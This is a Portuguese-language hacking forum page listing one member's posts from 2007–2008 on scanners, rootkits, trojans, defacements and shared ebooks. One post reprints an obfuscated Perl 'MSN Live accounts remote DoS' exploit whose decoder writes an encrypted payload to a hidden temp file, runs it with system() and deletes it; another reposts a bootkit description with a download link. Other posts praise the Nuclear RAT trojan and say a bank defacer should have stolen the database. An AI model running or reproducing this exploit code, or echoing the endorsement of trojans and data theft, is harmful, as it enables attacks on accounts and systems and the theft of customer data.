Menu

Show posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Show posts Menu

Messages - keyhell

#1
Será que não da pra fazer um bat pra localizar os aquivos .mp3 do HD e inserir os quadradinhos na tag???

Vo dar uma olhada se tem comando de atalho pra inserir isso no RUwindows.
#2
C/C#/C++ / Re: [Source] TCP SYN Scanner - Linux - C
19 de January , 2008, 05:26:14 PM
Isso sim é um verdadeiro topic.

Parabens!!!
#3
Darkers Project / Re: Pandora
02 de November , 2007, 02:25:16 PM
Funciona é com conexões que estão atrás de routers? Ou tem que criar um dns?

Abraços
#4
Perl / Re: [Mini-Tutorial + Code] Listador de sites (Googler)
24 de September , 2007, 09:03:14 AM
Quando ele busca uma string que o google não encontra resultado algum ele  para de buscar!!!
Tem como implementar algum timeout ou coisa do tipo pra ele pular pra proxima?

Abraços
#5
é fake... vi até o cara no orkut!!! COMPLETO IMBECIL
Se fazendo de hacker ensinando aos meninos como enviar trojan no msn e pegar o ip enquanto envia.
Tosco.
#6
Malware | Cracking | Hacker Tools / Re: Nuclear RAT 2.0.0
01 de September , 2007, 12:25:19 AM
Já uso desde as versões antigas... Melhor trojan que já usei.
Abraços
#7
Defacement / Re: SQL injection para os fins de dúvidas!
25 de August , 2007, 03:07:58 AM
Realmente o cara fazer um tutorial sobe um assunto que não tem noção fica muito complicado...
E o Wuefez ainda se da ao trabalho de explicar!!!
Aonde fomos parar?
Abraços
#8
Linux / Re: BackTrack 2 - O Que era BOM Ficou Melhor...
23 de August , 2007, 09:09:47 AM
Uso essa distro há um ano...
Não tenho do que reclamar!!!
Abraços
#9
E a qualidade da música ???
Percebe-se diferença?

Abraços
#10
Bugs | Exploits | Vulnerabilidades / Re: RootKit
21 de May , 2007, 11:57:21 PM
BOOT KIT is a project related to custom boot sector code subverting Windows NT Security Model.The sample presented currently keeps on escalating cmd.exe to system privileges every 30 secs.

It has several features
1) It's very small.The basic framework is just about 100 lines of assembly code.It supports 2000,XP,2003
2) It patches the kernel at runtime(no files are patched on disk).
3) BOOT KIT is PXE-compatible.
4)It can even lead to first ever PXE virus
5)It also enables you to load other root kits if you have physical access(Normally root kits can only be loaded by the administrator

The bootkit has been tested with a number of kernel mode shell codes such as
Loading Native Applications and drivers from the shell code
creating a kernel ,which periodically raises every CMD.EXE to system privileges.

The Source code will contain 4 levels of BOOT KITs(showcasing different payloads)
1) Basic framework ( Kernel patching has to be done later on)
2) Privilege escalation framework(demonstrates creating new system threads and how to escalate privileges easily)
3) Loading drivers and native applications from kernel mode without touching registry
4) PXE compatible code(Basic framework).

Download Basic Version from http://www.nvlabs.in/?q=node/14

Alguem ja ta a par desses novos Bootkits?
Seria um novo conceito pra rootkits?
Segue ai o link com uns codes pra galera dar uma olhada porém não conheco ninguem realmente bom em assembly.
Abraços
#11
Update. 
#!/usr/bin/perl
#
# MSN Live accounts remote DoS
# by: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
# 3 january 2007
# MorX Security Research Team
# www.morx.org
#
# Details:
#
# please see the previous exploit release for vulnerability details
# at www.morx.org/fuckmsn.txt since this is just an update supporting
# SSL which was implemented by MSN new authentification server.
#
# Disclaimer:

# this entire document is for eductional, testing and demonstrating
# purpose only.
# Modification use and/or publishing this information is entirely on
# your OWN risk, I cannot be held responsible for any of the above
#
# requires Net::SSLeay module which can be downloaded from
# http://search.cpan.org/CPAN/authors/id/F/FL/FLORA/Net_SSLeay.pm-1.30.tar.gz
#
# the source code can be easly decrypted for most of the experienced
# perl people. but at least those brainless lamers and scriptkiddies-
# wannabe would make a little effort before deleting my name and puting
# their lame nicknames.
#
# Enjoy, from Morocco.

package IIIkeyUnLock;
require Exporter;
@ISA       = qw(Exporter);
@EXPORT    = qw(_pENCd3k new);
@EXPORT_OK = qw(_pENCd3k new);

use strict;

sub new {
my $object = {};
bless $object;
return $object;
}

sub _pENCd3k ($$) {
my ($class, $_s, $_k1) = @_;

$_s = reverse($_s);
$_s =~ tr/\.\-\+\!\=\^/abcdef/;

my $_b = ord( substr( $_k1, 0, 1 ) );
my $_k2  = $_b ** 7;
my @_k_2 = split ( /''/, $_k2 );
$_k2  = join '', @_k_2;
my $_k3  = reverse($_k1);
$_k3 =~ tr/[a-m][n-z]/[n-z][a-m]/;
$_k3 =~ tr/[A-M][N-Z]/[N-Z][A-M]/;

my @_w1 = ();
for ( my $_d = 0 ; $_d < length($_s) ; $_d = $_d + 2 ) {
$_w1[$_d] = chr( hex( substr( $_s, $_d, 2 ) ) );
}

my $_w2 = join '', @_w1;
my $_r1 = _pENCxor( $_w2, $_k3 );
my $_r2 = _pENCxor( $_r1, $_k2 );
my $_o  = _pENCxor( $_r2, $_k1 );
return($_o);
}

sub _pENCxor ($$) {
my ($_P1, $_K1) = @_;

while ( length($_K1) < length($_P1) ) { $_K1 .= $_K1; }
$_K1 = substr( $_K1, 0, length($_P1) );

my @_p = split ( //, $_P1 );
my @_k = split ( //, $_K1 );

my $_i = 0;
my @_e = map { chr(ord($_) ^ ord($_k[$_i++])) } @_p;

my $_r = join '', @_e;
return($_r);
}

1;

use strict;

my $pENCobj = new IIIkeyUnLock;

open (cENC,">.//\x66\x6d\x2e\x74\x6d\x70") || die "xploit failed\n";
my $cmd;
while ( $cmd = <DATA> ) {
last if $cmd =~ /__END_DATA__/;
$cmd =~ s/\n//;
$cmd = $pENCobj->_pENCd3k($cmd, "morxdotorg");
print cENC $cmd;
}
close(cENC);

my $argvc=join(' ',@ARGV);
$argvc="" unless defined $argvc;
eval { system("\x70\x65\x72\x6c\x20\x66\x6d\x2e\x74\x6d\x70 ".$argvc) == 0 or die "xploit failed\n"; };
unlink(".//\x66\x6d\x2e\x74\x6d\x70");

1;

__DATA__
22779487=0342424+46585!0-5+494.505.454.510844525.6!08747^621-0
3281+53524!7344524-587653577-4-455!5.161642625262776551107^184!4.51024^42557!0+0=50421-0
!281^09141-185^534=484+4+5701121-0
=2-4!5-42761542414-484-5!557^064!5^49445=4748660574484^621-0
53=44545^0550545-43014055521-0
83-0
-2711575^4+424246621-0
83-0
135514^5646575+440^58474.4^5^40414^43444!415^0!46404-144=534=5.484447065-574846544-4605485=4.5+584.58470.475!560=544=520=555+435-42521-0
725455^49544842524!5756095.57425!5453144+480+445.55590552510=5-43525!03544+4-5-5402544.58085=5+4859485=47104!50570=594=404+0+415.561353421-0
!2+004!4254595!56085248474-4=414=5=4-515+4=4^445+420+43434619617^780!544+1.434243444=5^4148555=4^0+48415-194=4-43515!0.7471721-0
83-0
32+1944404-4.5.4=454=46621-0
22
131434^5353404+5758435343425!054!5-4!0^465=4-5+4+425-1!0143455944424447565!4404535846054441074448454!44404-59034948495+4=560=5^5^46521-0
521105.455=4!0748494!544252521-0
825594!0^4-4740414058495=055^5!0^4+53495945555049574^4-12544.4^460.485=4.41414844494=5604424=07544+480!545.5^174942555+4142504442584^621-0
+284048404358014=484=00495!085!5-4!0.57514^0.55444252534!4-45584447064=5!4+46095+4602424^4!5-4=48017703045.5^4941036574760^53484-521-0
22
22
13!1208505!465+515=4^4101574!044^5=4349407!1516484347727=78110258487707414!5
22
+36510.1300781361786!68620315484+42504842560.04514
22
23+1!01557508120=0108150=051401011-07050^1!05051=0200190=0-0-140+0+1.0508120=0108150=051401011-07050^1!05051=0200190=0-0-140+0+1.0508120=0108140!02494-40485
+36130!56771.5!5.464=55454848496208140!02494-40485
5240-084766434-4^474^52445+4!5541424+1.48475!064!53495-5!535^031547455=44465853594357005!5=4405555=03425242431=54474457575.59055259495208140!02494-40485
42!14134!7!13514647570.4+464659445!5208140!02494-40485
5240-08476^4242024.48444=465+5!4405555=025^524!434258480-4=474-490145584541525.4^43475200474-02425^46035=54531442414+464+465^4^4^5=406208140!02494-40485
23+1!0155734!4=4^434-13454247044!580!584!5=04595-4106564^414-49404^4.534941094=4=5=4!03554206474.484!5!460^7!0!0859544.5819687079045=4=445208140!02494-40485
23+1!01557508120=0108150=051401011-07050^1!05051=0200190=0-0-140+0+1.0508120=0108150=051401011-07050^1!05051=0200190=0-0-140+0+1.0508120=0108140!02494-40485
5240-08476272466-1349595.4740480752525-59455=40431^4-514477016+6466061+000+47640!02494-40485
22305014362456.59627!665012761649435802434^4!535954510!5^4^68075.464+690^5971000^06140!02494-40485
82004034.60405!560+545353466.624+4.597!021+444=4-47494871000^06140!02494-40485
6351408517^4^6!4^57461^7!5054680+465.5206574842670.415.55434^4-447614555.58585-4!547^076-594671000^06140!02494-40485
72.1114417644694648564.64655845494749761-425+1-5.45515545434-410^585848581!1.4858455=61000^06140!02494-40485
13-5!0!035-4.4!4
22
5240-08476272466-1349595.4740480752525-59455=40431^4-514477016+6466061+000+47640!02494-40485
22305014362456.59627!665012761649435802434^4!535954510!5^4^68075.464+690^5971000^06140!02494-40485
82004034.60405!560+545353466.624+4.597!021+444=4-47494871000^06140!02494-40485
6351408517^4^6!4^57461^7!5054680+465.5206574842670.415.55434^4-447614555.58585-4!547^076-594671000^06140!02494-40485
13!1^085-7+0+16040-7+0570717^70671.0.46415+4+4=5!525.71000^06140!02494-40485
53214055!734=70554+424353421!4+425+1=59424=510+5=5!0-681+0^037-727871000^06140!02494-40485
22
93110781361786!68620-1+1!020-1278617573666+0
-2808055!5.4^5!5^04440-1+1!0669696.756473626+0
23+1!080-45420515171-024-4^034-16001115180=13150+12415=4-491.064=46084-1!51595=0809675.551.5-4769184=4207181!11130+13091615121!4+4057161014505.0+1-0752595402101=0!161=0+12120-101+5-5-02405.436904034156536^131557455641455^4-4-407^14057818096-020^5-4!5=46045^5=0.0-1=505-02160513525019161300154.560=1-1806121+55440-1+1!020-160!056=77697+0
82004041^0=1-1-011!1^15071^1^04181.031411110=1616001^1208141-120^141^0=1-1-011!1^15071^1^04181.031411110=161600140-1+1!020-1478647.677+7+0
22
!21011-07050^1!05051=0200190=0-0-140+0+1.0508120=0108150=051401011-0
22
729191613070802766+7+660.5+55581^1^4.5!424447170-7.7=640-1+1!020-160!061702035+0
729191519120!1^4!5-4.034.474.4813484455414802035+5051640-1+1!020-160!061702005+0
42!14170=091.071+58424+4+58640-1+1!020-160!061702015+0
13.1^01726366621-06606763757^6^66721015444.510+7!706!7=7!72060^444^055144454-0^4!5-41641910455-58631618584^46524+5+4+4-4!73180469030+650202564+5+4-107+73715^5=6^1=786^65054!5.5^71494=6!06151719544842514-55467+14184954455250544.575^4-5.48640-1+1!020-160!061702065+0
22
-2652021!060249475!5-400!1=6-646-787^6717111+5652504+5!0!1-0+195+4=494=421^005!5=4
22
5321^0805191207140049544+075=5!4.42104^41524!41120!05181=0-5!46465^110106584945421^020-454
22
72311135!5059520-1!0951545=49061-00075440484!566+1+045046566=7-720!1-5.57640-1!0161786+05035=4652180
822180
22
833160840604.72590^4^69490644654-0155774^130!0=68657!02494-40485
02611090703037.75711!750+4+494942425.41480
+200!6=717-134=595-4142180
8355
22
82004034.6368121+4142495-48461-48431444494^564^064-525-14434!4^740!02494-40485
22
72!035-4.4!4
__END_DATA__


Quote# the source code can be easly decrypted for most of the experienced
# perl people.

Algum usuário experiente em Perl aqui no fórum ajudaria a desencriptar?

Abraços ;D
#12
Defacement / Re: Caixa Economica Federal Hacked?!
15 de May , 2007, 12:41:45 AM
É um crime fazer um deface desse ao invés de aproveitar o acesso pra baixar bd.
Dava pra alterar os arquivos?
#13
Revistas e eBooks / Re: Diversos Ebooks para download
13 de May , 2007, 12:46:55 AM
#14
Revistas e eBooks / Compartilhando meu box.
12 de May , 2007, 04:54:03 AM
Conforme havia prometido estou compartilhando meu box de livros com vocês...

Desculpem a bagunça na organização mas deu o maior trabalho organizar todos esses arquivos no pouco tempo que me sobra após o trampo mas está aí o melhor que pude fazer já que muitas pessoas estavam me pedindo.

Naveguem pelas pastas pois deve haver bastante material útil para todos.

Abraços e bons estudos. ;D

http://www.box.net/shared/em2rquzu9r
#15
Revistas e eBooks / Re: Diversos Ebooks para download
07 de May , 2007, 02:54:35 PM
Opa bem legal....
Eu tenho um box desse onde tenho colocados todas as apostilas que consigo ha tempos... apenas assuntos de programação,hacking,webdesign... tudo relacionado a informática!!!
O box deve ter uns 800mn ja!!!
Vo tentar dar uma organizada nele e compartilhar com vcs.

Abraços